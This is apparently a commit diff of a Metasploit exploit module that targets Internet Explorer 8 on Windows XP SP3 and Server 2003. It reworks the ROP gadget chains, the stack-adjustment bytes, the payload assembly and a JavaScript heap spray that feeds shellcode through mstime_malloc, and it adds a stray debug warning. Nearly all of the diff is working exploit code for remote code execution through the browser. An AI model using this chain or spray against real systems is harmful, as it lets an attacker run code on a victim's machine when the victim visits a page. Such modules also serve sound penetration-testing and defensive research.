11##
2- #
32# This file is part of the Metasploit Framework and may be subject to
43# redistribution and commercial restrictions. Please see the Metasploit
54# Framework web site for more information on licensing and terms of use.
@@ -83,7 +82,6 @@ def initialize(info={})
8382 end
8483
8584 def get_target ( agent )
86- #If the user is already specified by the user, we'll just use that
8785 return target if target . name != 'Automatic'
8886
8987 nt = agent . scan ( /Windows NT (\d \. \d )/ ) . flatten [ 0 ] || ''
@@ -115,25 +113,16 @@ def get_target(agent)
115113 return nil
116114 end
117115
118- def junk ( n = 4 )
119- rand_text_alpha ( n ) . unpack ( "V" ) [ 0 ] . to_i
120- end
121-
122- def nop
123- make_nops ( 4 ) . unpack ( "V" ) [ 0 ] . to_i
124- end
125-
126116 def get_payload ( t , cli )
127- code = payload . encoded
128-
129- # No rop. Just return the payload.
130- return code if t [ 'Rop' ] . nil?
117+ rop_payload = ''
131118
132119 case t [ 'Rop' ]
133120 when :msvcrt
134- case t . name
135- when 'IE 8 on Windows XP SP3'
136- rop_gadgets =
121+ algin = "\x81 \xc4 \x54 \xf2 \xff \xff " # Stack adjustment # add esp, -3500
122+ chain = ''
123+
124+ if t . name == 'IE 8 on Windows XP SP3'
125+ chain =
137126 [
138127 0x77c1e844 , # POP EBP # RETN [msvcrt.dll]
139128 0x77c1e844 , # skip 4 bytes [msvcrt.dll]
@@ -158,8 +147,12 @@ def get_payload(t, cli)
158147 0x77c12df9 , # PUSHAD # RETN [msvcrt.dll]
159148 0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]
160149 ] . pack ( "V*" )
161- when 'IE 8 on Windows Server 2003'
162- rop_gadgets =
150+
151+ elsif t . name == 'IE 8 on Windows Server 2003'
152+ junk = rand_text_alpha ( 4 ) . unpack ( "V" ) [ 0 ] . to_i
153+ nop = make_nops ( 4 ) . unpack ( "V" ) [ 0 ] . to_i
154+
155+ chain =
163156 [
164157 0x77bb2563 , # POP EAX # RETN
165158 0x77ba1114 , # <- *&VirtualProtect()
@@ -187,40 +180,16 @@ def get_payload(t, cli)
187180 0x77be6591 # PUSHAD # ADD AL,0EF # RETN
188181 ] . pack ( "V*" )
189182 end
190- else
191- rop_gadgets =
192- [
193- 0x7c37653d , # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
194- 0xfffffdff , # Value to negate, will become 0x00000201 (dwSize)
195- 0x7c347f98 , # RETN (ROP NOP) [msvcr71.dll]
196- 0x7c3415a2 , # JMP [EAX] [msvcr71.dll]
197- 0xffffffff ,
198- 0x7c376402 , # skip 4 bytes [msvcr71.dll]
199- 0x7c351e05 , # NEG EAX # RETN [msvcr71.dll]
200- 0x7c345255 , # INC EBX # FPATAN # RETN [msvcr71.dll]
201- 0x7c352174 , # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
202- 0x7c344f87 , # POP EDX # RETN [msvcr71.dll]
203- 0xffffffc0 , # Value to negate, will become 0x00000040
204- 0x7c351eb1 , # NEG EDX # RETN [msvcr71.dll]
205- 0x7c34d201 , # POP ECX # RETN [msvcr71.dll]
206- 0x7c38b001 , # &Writable location [msvcr71.dll]
207- 0x7c347f97 , # POP EAX # RETN [msvcr71.dll]
208- 0x7c37a151 , # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
209- 0x7c378c81 , # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
210- 0x7c345c30 # ptr to 'push esp # ret ' [msvcr71.dll]
211- # rop chain generated with mona.py
212- ] . pack ( "V*" )
213- end
214183
215- rop_payload = rop_gadgets
216- case t [ 'Rop' ]
217- when :msvcrt
218- rop_payload << "\x81 \xc4 \x54 \xf2 \xff \xff " # Stack adjustment # add esp, -3500
184+ rop_payload = chain + algin + payload . encoded
185+
219186 else
220- rop_payload << "\x81 \xEC \xF0 \xD8 \xFF \xFF " # sub esp, -10000
187+ code = "\x81 \xEC \xF0 \xD8 \xFF \xFF " # sub esp, -10000
188+ code << payload . encoded
189+ code << rand_text_alpha ( 12000 )
190+
191+ rop_payload = generate_rop_payload ( 'java' , code )
221192 end
222- rop_payload << code
223- rop_payload << rand_text_alpha ( 12000 ) unless t [ 'Rop' ] == :msvcrt
224193
225194 return rop_payload
226195 end
@@ -278,28 +247,22 @@ def load_exploit_html(my_target, cli)
278247
279248 CollectGarbage();
280249
281- hd = unescape("ABCD");
250+ sparkle = unescape("ABCD");
282251 for (i=0; i < 2; i++) {
283- unicorn += unescape("ABCD");
252+ sparkle += unescape("ABCD");
284253 }
285- unicorn += unescape("AB");
286-
287- unicorn += unescape("#{ js_payload }
254+ sparkle += unescape("AB");
255+ sparkle += unescape("#{ js_payload }
288256
289- animvalues = unescape("#{ align_esp }
257+ magenta = unescape("#{ align_esp }
290258
291259 for (i=0; i < 0x70/4; i++) {
292- if (i == 0x70/4-1) {
293- animvalues += unescape("#{ xchg_esp }
294- }
295- else {
296- animvalues += unescape("#{ align_esp }
297- }
260+ if (i == 0x70/4-1) { magenta += unescape("#{ xchg_esp }
261+ else { magenta += unescape("#{ align_esp }
298262 }
299263
300- animvalues += unicorn;
301-
302- mstime_malloc({shellcode:animvalues, heapBlockSize:0x38, objId:"myanim"});
264+ magenta += sparkle;
265+ mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:"myanim"});
303266 }
304267
305268 </script>
@@ -315,12 +278,12 @@ def load_exploit_html(my_target, cli)
315278 end
316279
317280 def on_request_uri ( cli , request )
281+ print_warning ( "test!!!!!!!!!!!!!" )
318282 agent = request . headers [ 'User-Agent' ]
319283 uri = request . uri
320284 print_status ( "Requesting: #{ uri } )
321285
322286 my_target = get_target ( agent )
323- # Avoid the attack if no suitable target found
324287 if my_target . nil?
325288 print_error ( "Browser not supported, sending 404: #{ agent } )
326289 send_not_found ( cli )
@@ -334,4 +297,3 @@ def on_request_uri(cli, request)
334297 end
335298
336299end
337-
0 commit comments